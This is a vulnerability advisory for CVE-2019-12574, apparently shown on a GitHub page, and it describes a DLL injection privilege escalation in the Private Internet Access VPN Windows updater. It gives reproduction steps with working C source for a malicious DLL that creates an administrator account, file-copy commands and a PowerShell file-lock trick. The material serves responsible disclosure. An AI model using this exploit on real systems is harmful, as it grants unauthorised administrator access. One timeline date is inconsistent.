-
Notifications
You must be signed in to change notification settings - Fork 30
/
CVE-2019-12574.txt
205 lines (140 loc) · 6.97 KB
/
CVE-2019-12574.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
Title: PIA Windows Privilege Escalation: DLL Injection
Author: Rich Mirch
CVE: CVE-2019-12574
Vendor Advisory: https://www.privateinternetaccess.com/pages/changelog
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v1.0 for Windows could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.
The PIA Desktop client is vulnerable to a DLL injection vulnerability during
the update process. The updater loads several DLLs from a folder that
authenticated users have write access to. A low privileged user can leverage
this vulnerability to execute arbitrary code as an administrator.
When an update is available a low privilege user is notified in the client and is
presented with the option to download it. When clicked, the PIA client sends a
command to the PIA service to download the update. The update is staged in
"C:\ProgramData\Private Internet Access\update\". This directory and all files
within it are removed prior to storing the update file.
A low privileged user can create a file in the update directory and set a lock on
it which prevents the PIA service from deleting it during the download process.
This can be leveraged to stage a malicious DLL that the update process will load.
The next time an administrator opens the PIA client a new option to install the
latest version will be available. When clicked, the updater will install the update
and silently execute arbitrary code as the administrator. This PoC will demonstrate
that a new administrator named "woot" will be added during the update process.
CVSS
Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H/E:F/RL:U/RC:R
Base: 6.7
Temporal: 6.3
The following DLLs are loaded by the pia-windows-x64-1.0-02176.exe
C:\ProgramData\Private Internet Access\update\spinf.dll
C:\ProgramData\Private Internet Access\update\USERENV.dll
C:\ProgramData\Private Internet Access\update\newdev.dll
C:\ProgramData\Private Internet Access\update\DEVRTL.dll
C:\ProgramData\Private Internet Access\update\DEVOBJ.dll
C:\ProgramData\Private Internet Access\update\drvstore.dll
C:\ProgramData\Private Internet Access\update\PROPSYS.dll
C:\ProgramData\Private Internet Access\update\LINKINFO.dll
C:\ProgramData\Private Internet Access\update\ntshrui.dll
C:\ProgramData\Private Internet Access\update\SspiCli.dll
C:\ProgramData\Private Internet Access\update\srvcli.dll
C:\ProgramData\Private Internet Access\update\cscapi.dll
C:\ProgramData\Private Internet Access\update\CLDAPI.dll
C:\ProgramData\Private Internet Access\update\FLTLIB.DLL
C:\ProgramData\Private Internet Access\update\apphelp.dll
C:\ProgramData\Private Internet Access\update\netutils.dll
Permissions of "c:\ProgramData\Private Internet Access" showing
that BUILTIN\Users has write access.
c:\ProgramData\Private Internet Access NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Permissions of "c:\ProgramData\Private Internet Access\update" showing
that the test1 user has full access(see step 2).
c:\ProgramData\Private Internet Access\update NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CHAOS\test1:(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Test Environment
OS: Microsoft Windows 10 Pro 10.0.17763 N/A Build 17763
PIA Version: v0.9.9 beta
PIA Upgrade Version: v1.0
Steps to reproduce
All steps are executed as a low privileged user unless otherwise noted.
1) Open a cmd shell and change to the "C:\ProgramData\Private Internet Access" folder.
cd "c:\ProgramData\Private Internet Access"
2) Create the update folder and change to it.
mkdir update
cd update
3) Create a malicious library to create an administrator account named woot when loaded.
/* Cross Compile with
x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
*/
#include <windows.h>
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
system("cmd /c net user woot insertpasswordhere /add");
system("cmd /c net localgroup administrators woot /add");
break;
case DLL_THREAD_ATTACH:
// Do thread-specific initialization.
break;
case DLL_THREAD_DETACH:
// Do thread-specific cleanup.
break;
case DLL_PROCESS_DETACH:
// Perform any necessary cleanup.
break;
}
return TRUE; // Successful DLL_PROCESS_ATTACH.
}
4) Copy the malicious DLL into the update folder. For this PoC we will use spinf.dll
as the target.
copy woot.dll spinf.dll
5) Execute powershell and set a lock on the spinf.dll file to prevent the library
from being deleted. I appreciate @poshkatz for teaching me how to easily lock files
with PowerShell.
$f = [System.IO.File]::Open("spinf.dll",[System.IO.FileMode]::Open [System.IO.FileAccess]::Read,[System.IO.FileShare]::Read)
6) Verify the lock by typing $f. The output should look like this.
CanRead : True
CanWrite : False
CanSeek : True
IsAsync : False
Length : 287283
Name : c:\ProgramData\Private Internet Access\update\spinf.dll
Position : 0
Handle : 880
SafeFileHandle : Microsoft.Win32.SafeHandles.SafeFileHandle
CanTimeout : False
ReadTimeout :
WriteTimeout :
7) Open the PIA client. An update will be available. Click Download v1.0.0.
8) Now that the update is staged, exit all windows and logout.
9) Login as an Administrator.
10) Open the PIA client and click the update icon in the upper right and then
click the "Install v1.0.0" option. The update will install normally.
11) At this point the "woot" administrator account will exist. Open a cmd shell
and verify.
net user woot
Timeline:
2019-01-13: Reported to vendor
2018-01-13: Vendor acknowledged receipt of report
2019-01-22: Vendor released fix in v1.0.1
2019-06-10: Public disclosure